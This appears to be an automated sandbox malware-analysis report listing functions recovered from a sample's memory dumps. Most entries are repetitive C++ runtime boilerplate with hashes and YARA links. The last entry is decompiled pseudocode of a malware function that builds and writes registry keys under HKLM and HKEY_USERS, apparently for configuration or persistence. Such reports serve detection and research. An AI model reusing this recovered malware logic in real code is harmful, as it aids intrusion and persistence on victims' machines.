                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 681e0eba1d5ddadcbc0d80fecb081a90cc4f3dd7994a56ac0c0bf4d3fe245d21
                                                                                                                                  • Instruction ID: 3b750ac5f0521b78b7964e6faffb0a07d4eedf327a077002df17b1faa24f84c4
                                                                                                                                  • Opcode Fuzzy Hash: 681e0eba1d5ddadcbc0d80fecb081a90cc4f3dd7994a56ac0c0bf4d3fe245d21
                                                                                                                                  • Instruction Fuzzy Hash: BB01D671900616DBCF01DBE8C554AED7B796F85398F110D09D8106B2C0DF749A4BCB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E9055EC, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9055F3
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9055FD
                                                                                                                                  • int.LIBCPMT ref: 6E905614
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90564E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90566E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E90567B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1e91871c5d3a3bfdd581383a6af938c3a46e51f9c7985a221810848d4a84316c
                                                                                                                                  • Instruction ID: 5c9c982138a02d9ea60e3df29f58f4abac5ed075490652780e9742afde9798e3
                                                                                                                                  • Opcode Fuzzy Hash: 1e91871c5d3a3bfdd581383a6af938c3a46e51f9c7985a221810848d4a84316c
                                                                                                                                  • Instruction Fuzzy Hash: EC01C031900A19CBCB01DBE8C954AED777AAF95768F540D0DD410AB2D0DF74D9478B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7D0A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7D11
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7D1B
                                                                                                                                  • int.LIBCPMT ref: 6E8F7D32
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7D6C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7D8C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: bd63205533edd6f4b850c4a434120208f6764dd55c1d45360a12c5e0f0401939
                                                                                                                                  • Instruction ID: 754441454ffdcce11edbdf5973a80b12380b1481401f2f19d5bd2b6402722df7
                                                                                                                                  • Opcode Fuzzy Hash: bd63205533edd6f4b850c4a434120208f6764dd55c1d45360a12c5e0f0401939
                                                                                                                                  • Instruction Fuzzy Hash: 5D01AD7591061ADBDB02EBE8C8546FD7779AF85398F600E09D4116B2C0DB74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7579, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7580
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F758A
                                                                                                                                  • int.LIBCPMT ref: 6E8F75A1
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F75DB
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F75FB
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7608
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 2398042ed61fe7a42c04db38213ada4e534ae55af2cc044f9306c9529c3d5e02
                                                                                                                                  • Instruction ID: adac9e9d02c415bfa1da94608cddf526ebe83463a9d13019bb77094e22f0509e
                                                                                                                                  • Opcode Fuzzy Hash: 2398042ed61fe7a42c04db38213ada4e534ae55af2cc044f9306c9529c3d5e02
                                                                                                                                  • Instruction Fuzzy Hash: C701003190061ACBCF01DFE8C8446EDBB7AAF85399F104D19D4206B2C0DF74DA0B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7A21, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7A28
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7A32
                                                                                                                                  • int.LIBCPMT ref: 6E8F7A49
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7A83
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7AA3
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7AB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 5cae0b53ed271250d80a834b566ee1a0e8df5bcd9d994e3ea8ea69ce948a3b98
                                                                                                                                  • Instruction ID: f2cae7bac51491897d6804430f88878f2784499b1103424d8335ea1b7ea5f6c9
                                                                                                                                  • Opcode Fuzzy Hash: 5cae0b53ed271250d80a834b566ee1a0e8df5bcd9d994e3ea8ea69ce948a3b98
                                                                                                                                  • Instruction Fuzzy Hash: DF01C431900616DBDB01DBE8C8546EE7B79AF85394F110D09E4116B2C0DF749A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905398, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90539F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9053A9
                                                                                                                                  • int.LIBCPMT ref: 6E9053C0
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9053FA
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90541A
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905427
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: b61b374049b54f1ebf213b984e254982e0aeef67177dbee761b21b72765117ce
                                                                                                                                  • Instruction ID: 358e915231c67d732a471a774b7cf4508512ed95c458f85b2a1d668df016cf7e
                                                                                                                                  • Opcode Fuzzy Hash: b61b374049b54f1ebf213b984e254982e0aeef67177dbee761b21b72765117ce
                                                                                                                                  • Instruction Fuzzy Hash: DC01AD71904619DBCF11DBE8C854AED7779AF95368F604D0DD410AB280DB74DD46CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F73BA, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F73C1
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F73CB
                                                                                                                                  • int.LIBCPMT ref: 6E8F73E2
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F741C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F743C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7449
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1bf115f5b73969ad213d1fe5ed95a436d707bdc652bd1d07581d9e2c5786ba2c
                                                                                                                                  • Instruction ID: 782399bd0ad5c3cbcb3ad7450edbb73f958966701449313e0df90b736cd0c7d0
                                                                                                                                  • Opcode Fuzzy Hash: 1bf115f5b73969ad213d1fe5ed95a436d707bdc652bd1d07581d9e2c5786ba2c
                                                                                                                                  • Instruction Fuzzy Hash: 0C01C07190061ADBCF01DFE8C954AEE7B79AF95398F204D09D810AB2D0DF74DA4B9B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7BE0, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7BE7
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7BF1
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C08
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7C42
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7C62
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7C6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1cb5fb0dbf8ead3edb56e296bed3117c0eee1e8cfc3b3aa51e3c55015d883c04
                                                                                                                                  • Instruction ID: 1678171c9ebac73d6eabb11e4e256099e90fbaefa3b2f61e45b5820a44a64127
                                                                                                                                  • Opcode Fuzzy Hash: 1cb5fb0dbf8ead3edb56e296bed3117c0eee1e8cfc3b3aa51e3c55015d883c04
                                                                                                                                  • Instruction Fuzzy Hash: D301C031900619DBCF05DBE8C954AEE77BAAF95398F114D09D4106B2C0DF759E47CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1B6C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1B73
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1B7D
                                                                                                                                  • int.LIBCPMT ref: 6E8F1B94
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1BCE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1BEE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1BFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 2317695287f27033c4efe903a19ce9f969b291ddc9b16ce942c84c7c7a5a7ab9
                                                                                                                                  • Instruction ID: 5b4425c6f94c1c861d846ecb29d72aa664c5ec95751fbda5a97360da72f5604e
                                                                                                                                  • Opcode Fuzzy Hash: 2317695287f27033c4efe903a19ce9f969b291ddc9b16ce942c84c7c7a5a7ab9
                                                                                                                                  • Instruction Fuzzy Hash: 6D01C071900619DBCF01DBE8C994AEE7B79AF85398F114D09E4106B280EF749E4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F78F7, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F78FE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7908
                                                                                                                                  • int.LIBCPMT ref: 6E8F791F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7959
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7979
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7986
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 31cd22187ae5ba17f3532dbd5cd75dfbf4dffba04c08468e5fc32c709a7f099c
                                                                                                                                  • Instruction ID: ac8a07094d15551a8694c85ddc199398bb2cbecfc4aca8c91f7583edce66c46b
                                                                                                                                  • Opcode Fuzzy Hash: 31cd22187ae5ba17f3532dbd5cd75dfbf4dffba04c08468e5fc32c709a7f099c
                                                                                                                                  • Instruction Fuzzy Hash: BA01C071A0061ADBDF01DBE8C954AEDB7BAAF95398F104D09E4506B2C0DF74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7862, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7869
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7873
                                                                                                                                  • int.LIBCPMT ref: 6E8F788A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F78C4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F78E4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F78F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 3686bba3bee8e96078c8f6a104bd30e33814984ed11cfd446279ff405e9e3bcf
                                                                                                                                  • Instruction ID: 0d5058e70bcb0a559f184b9b828f7ac90169e727680afa8374d7518b43e8fbc5
                                                                                                                                  • Opcode Fuzzy Hash: 3686bba3bee8e96078c8f6a104bd30e33814984ed11cfd446279ff405e9e3bcf
                                                                                                                                  • Instruction Fuzzy Hash: 9501ED31A10619DBCF01DBE8C854AEDBB7AAF85798F100C08D8107B2C0DB749947CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F798C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7993
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F799D
                                                                                                                                  • int.LIBCPMT ref: 6E8F79B4
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F79EE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7A0E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7A1B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 7df6204f9d6c49063b2ccd8fbd09803162dc494f45baf35dab1c96057c6d67e5
                                                                                                                                  • Instruction ID: 8c10f35ad6274fd1dfaea977576a2d4c133fa56c925716ab5f3c05dd9e5b98fc
                                                                                                                                  • Opcode Fuzzy Hash: 7df6204f9d6c49063b2ccd8fbd09803162dc494f45baf35dab1c96057c6d67e5
                                                                                                                                  • Instruction Fuzzy Hash: EE010031900619CBCF01DBE8C954AEE7B79AF81398F114C09E8116B2C0DF749A07CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A282B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E031A282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x31ad37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E031A1922( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E031A5C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E031A4AAB(_a8);
						goto L29;
					}
					_t64 =  *0x31ad2b0; // 0x5bd9b38
					_t16 = _t64 + 0xc; // 0x5bd9c06
					_t65 = E031A1922(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d031ac0
						if(E031A4A6D(_t97,  *_t33, _t91, _a8,  *0x31ad374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x31ad2e0; // 0x2a2a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x31aea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x31aea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E031A5F64(_t69,  *0x31ad374,  *0x31ad378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x31ad2e0; // 0x2a2a5a8
									_t44 = _t71 + 0x31ae83e; // 0x74666f53
									_t73 = E031A1922(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d031ac0
										E031A5DDA( *_t47, _t91, _a8,  *0x31ad378, _a24);
										_t49 = _t101 + 0x10; // 0x3d031ac0
										E031A5DDA( *_t49, _t91, _t99,  *0x31ad370, _a16);
										E031A4AAB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d031ac0
									E031A5DDA( *_t40, _t91, _a8,  *0x31ad378, _a24);
									_t43 = _t101 + 0x10; // 0x3d031ac0
									E031A5DDA( *_t43, _t91, _a8,  *0x31ad370, _a16);
								}
								if( *_t101 != 0) {
									E031A4AAB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d031ac0
					_t81 = E031A63F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d031ac0
							E031A4A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E031A4AAB(_t100);
						_t98 = _a16;
					}
					E031A4AAB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E031AA938(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x31ad37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                                                                                                  0x031a282b
                                                                                                                                  0x031a2834
                                                                                                                                  0x031a283b
                                                                                                                                  0x031a2840
                                                                                                                                  0x031a28ad
                                                                                                                                  0x031a28b3
                                                                                                                                  0x031a28b8
                                                                                                                                  0x031a28bf
                                                                                                                                  0x031a28c4
                                                                                                                                  0x031a28c9
                                                                                                                                  0x031a2a34
                                                                                                                                  0x031a2a3b
                                                                                                                                  0x031a2a3b
                                                                                                                                  0x031a2a40
                                                                                                                                  0x031a2a42
                                                                                                                                  0x031a2a42
                                                                                                                                  0x031a2a4b
                                                                                                                                  0x031a2a4b
                                                                                                                                  0x031a28cf
                                                                                                                                  0x031a28db
                                                                                                                                  0x031a2a2a
                                                                                                                                  0x031a2a2d
                                                                                                                                  0x00000000
                                                                                                                                  0x031a2a2d
                                                                                                                                  0x031a28e1
                                                                                                                                  0x031a28e6
                                                                                                                                  0x031a28e9
                                                                                                                                  0x031a28ee
                                                                                                                                  0x031a28f3
                                                                                                                                  0x031a293c
                                                                                                                                  0x031a293c
                                                                                                                                  0x031a294f
                                                                                                                                  0x031a2959
                                                                                                                                  0x031a295f
                                                                                                                                  0x031a2966
                                                                                                                                  0x031a2970
                                                                                                                                  0x031a2970
                                                                                                                                  0x031a2968
                                                                                                                                  0x031a2968
                                                                                                                                  0x031a2968
                                                                                                                                  0x031a2968
                                                                                                                                  0x031a2992
                                                                                                                                  0x031a299a
                                                                                                                                  0x031a29c8
                                                                                                                                  0x031a29cd
                                                                                                                                  0x031a29d4
                                                                                                                                  0x031a29d9
                                                                                                                                  0x031a29dd
                                                                                                                                  0x031a2a0f
                                                                                                                                  0x031a29df
                                                                                                                                  0x031a29ec
                                                                                                                                  0x031a29ef
                                                                                                                                  0x031a29ff
                                                                                                                                  0x031a2a02
                                                                                                                                  0x031a2a08
                                                                                                                                  0x031a2a08
                                                                                                                                  0x031a299c
                                                                                                                                  0x031a29a9
                                                                                                                                  0x031a29ac
                                                                                                                                  0x031a29be
                                                                                                                                  0x031a29c1
                                                                                                                                  0x031a29c1
                                                                                                                                  0x031a2a19
                                                                                                                                  0x031a2a25
                                                                                                                                  0x031a2a1b
                                                                                                                                  0x031a2a1e
                                                                                                                                  0x031a2a1e
                                                                                                                                  0x031a2a19
                                                                                                                                  0x031a2992
                                                                                                                                  0x00000000
                                                                                                                                  0x031a2959
                                                                                                                                  0x031a2902
                                                                                                                                  0x031a2905
                                                                                                                                  0x031a290c
                                                                                                                                  0x031a2912
                                                                                                                                  0x031a2915
                                                                                                                                  0x031a2917
                                                                                                                                  0x031a2923
                                                                                                                                  0x031a2926
                                                                                                                                  0x031a2926
                                                                                                                                  0x031a292c
                                                                                                                                  0x031a2931
                                                                                                                                  0x031a2931
                                                                                                                                  0x031a2937
                                                                                                                                  0x00000000
                                                                                                                                  0x031a2937
                                                                                                                                  0x031a2845
                                                                                                                                  0x00000000
                                                                                                                                  0x031a286c
                                                                                                                                  0x031a286c
                                                                                                                                  0x031a2878
                                                                                                                                  0x031a288b
                                                                                                                                  0x031a2891
                                                                                                                                  0x031a2899
                                                                                                                                  0x00000000
                                                                                                                                  0x031a2899

                                                                                                                                  APIs
                                                                                                                                  • StrChrA.SHLWAPI(031A2197,0000005F,00000000,00000000,00000104), ref: 031A285E
                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 031A288B
                                                                                                                                    • Part of subcall function 031A1922: lstrlen.KERNEL32(?,00000000,05BD9B38,00000000,031A74FF,05BD9D16,?,?,?,?,?,69B25F44,00000005,031AD00C), ref: 031A1929
                                                                                                                                    • Part of subcall function 031A1922: mbstowcs.NTDLL ref: 031A1952
                                                                                                                                    • Part of subcall function 031A1922: memset.NTDLL ref: 031A1964
                                                                                                                                    • Part of subcall function 031A5DDA: lstrlenW.KERNEL32(?,?,?,031A29F4,3D031AC0,80000002,031A2197,031A258B,74666F53,4D4C4B48,031A258B,?,3D031AC0,80000002,031A2197,?), ref: 031A5DFF
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 031A28AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
